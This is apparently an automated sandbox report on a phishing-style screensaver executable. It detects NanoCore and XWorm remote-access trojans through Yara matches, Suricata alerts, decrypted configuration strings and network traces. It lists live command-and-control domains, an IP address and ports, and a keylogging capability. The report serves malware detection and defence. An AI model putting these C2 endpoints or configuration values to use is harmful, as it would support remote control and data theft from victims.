Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: new policy.scr.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: airlineagancy.casacam.net
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: 7076
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack	String decryptor: USB.exe

Uses 32bit PE files

Source: new policy.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: new policy.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\ARM\Desktop\ncsource\Plugins\CorePlugin\CoreClientPlugin\obj\Release\CoreClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_05C0D780
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then jmp 05D56B5Ch	0_2_05D56AD8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then jmp 05D5D260h	0_2_05D5D1A0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then jmp 05D5D260h	0_2_05D5D1A8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then jmp 05D56B5Ch	0_2_05D56AC8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_077510B3
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	3_2_07756D10
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	3_2_07756D00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 02B52E8Ah	6_2_02B530BD
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	6_2_02B51A00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	6_2_02B51A08
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	6_2_02B519B9
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 02B52E8Ah	6_2_02B52FD9
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 02B52E8Ah	6_2_02B52DB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 02B52E8Ah	6_2_02B52DC0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	6_2_05C4D780
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05D96B5Ch	6_2_05D96AD8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05D9D260h	6_2_05D9D1A8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05D9D260h	6_2_05D9D1A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05D96B5Ch	6_2_05D96AC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F130BD
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F13138
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_00F119B9
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_00F11A00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_00F11A08
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F12DC0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F12DB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 00F12E8Ah	7_2_00F12FD9
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_057FD780
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05946B5Ch	7_2_05946AD8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 0594D260h	7_2_0594D1A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 0594D260h	7_2_0594D1A8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 4x nop then jmp 05946B5Ch	7_2_05946AC8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49738 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49736 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:49739 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53337 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 78.159.112.29:7076
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49739 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49739 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49736 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53337 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49736 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53337 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53344 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53339 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53339 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53344 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53344 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53341 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046909 - Severity 1 - ET MALWARE NanoCore RAT Keepalive Response 1 : 78.159.112.29:65535 -> 192.168.2.4:53344
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53348 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53339 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49738 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49738 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53345 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53341 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53347 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53349 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53340 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53341 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53348 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53348 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53340 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53340 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 78.159.112.29:7076
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53346 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53350 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2025019 - Severity 1 - ET MALWARE Possible NanoCore C2 60B : 192.168.2.4:53343 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2816718 - Severity 1 - ETPRO MALWARE NanoCore RAT Keep-Alive Beacon : 192.168.2.4:53338 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:49732 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2046914 - Severity 1 - ET MALWARE NanoCore RAT CnC 7 : 192.168.2.4:53343 -> 78.159.112.29:65535
Source: Network traffic	Suricata IDS: 2822326 - Severity 1 - ETPRO MALWARE NanoCore RAT CnC 19 : 192.168.2.4:53343 -> 78.159.112.29:65535

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: airlineagancy.casacam.net
Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: jacksonnnn233.theworkpc.com

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 78.159.112.29:65535

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LEASEWEB-DE-FRA-10DE LEASEWEB-DE-FRA-10DE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: jacksonnnn233.theworkpc.com
Source: global traffic	DNS traffic detected: DNS query: airlineagancy.casacam.net
Source: global traffic	DNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa

Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://google.com
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.0000000002511000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2232333043.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2324492421.00000000047C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.0000000002986000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Installs a raw input device (often for capturing keystrokes)

Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

memstr_a586111e-f

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
